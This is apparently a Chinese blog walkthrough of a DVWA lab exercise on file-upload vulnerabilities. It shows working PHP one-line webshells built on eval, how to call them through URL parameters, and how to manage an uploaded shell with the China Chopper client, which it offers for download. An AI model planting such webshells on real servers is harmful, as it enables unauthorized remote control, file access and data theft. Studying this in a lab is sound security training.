1. 程式人生 > >Web安全_檔案上傳漏洞_DVWA上傳shell+中國菜刀管理檔案

Web安全_檔案上傳漏洞_DVWA上傳shell+中國菜刀管理檔案

遠端登陸靶機:

  1. 開啟kali命令列
  2. ssh 賬號@地址
  3. 輸入密碼
  4. 成功連線
    在這裡插入圖片描述
    這時就可以輸入命令對靶機進行操作,如檢視、刪除檔案、進入目錄等等
    如這裡進入靶機裡DVWA上傳檔案目錄處檢視所上傳的檔案:
    在這裡插入圖片描述
    可以檢視到有四個檔案,可以進行刪除(這裡刪除php字尾的檔案,防止對之後的實驗干擾)使用rm 檔案命令

1、上傳一句話木馬
一句話木馬主要為系統函式,php主要為eval、system、shell_exec、assert函式等
eval函式可分為兩種

  • 在瀏覽器進行操作
<?php eval($_REQUEST['cmd']);?>

cmd為引數名可以更換其他名字

  • 在客戶端軟體(如中國菜刀)進行操作
<?php eval($_POST[pass]);?>

pass為密碼,為我們客戶端登陸到後臺的密碼

2.1瀏覽器操作後臺

  • 提前先準備好一個一句話木馬檔案shell.php,內容為<?php eval($_REQUEST['cmd']);?>
  • 然後開啟DVWA檔案上傳的頁面對此木馬進行上傳
    在這裡插入圖片描述
    然後將檔案路徑複製到位址列中將#覆蓋,末尾加?cmd=xxx;
    此時可以對cmd進行傳參,如cmd=phpinfo();
    末尾需要記得加分號
    在這裡插入圖片描述

2.2客戶端操作後臺

  • 準備好一句話木馬檔案chopper.php,內容為<?php eval($_POST[abc]);?>我這裡將密碼改為了abc
  • 然後上傳到靶機上,環境為windows7(中國菜刀執行在windows系統下)
  • 上傳好檔案之後,開啟中國菜刀,右鍵選擇新增按照如圖進行配置,配置好點選新增
    在這裡插入圖片描述
  • 新增好了之後,列表中就會有我們剛新增的shell
  • 右鍵進行選擇,可以進行諸如檔案管理,資料庫管理等等操作
    在這裡插入圖片描述
    可以看到第一次上傳的shell.php和第二次上傳的chopper.php

歡迎關注我的微信公眾號,後臺回覆“菜刀”即可獲得中國菜刀資源
在這裡插入圖片描述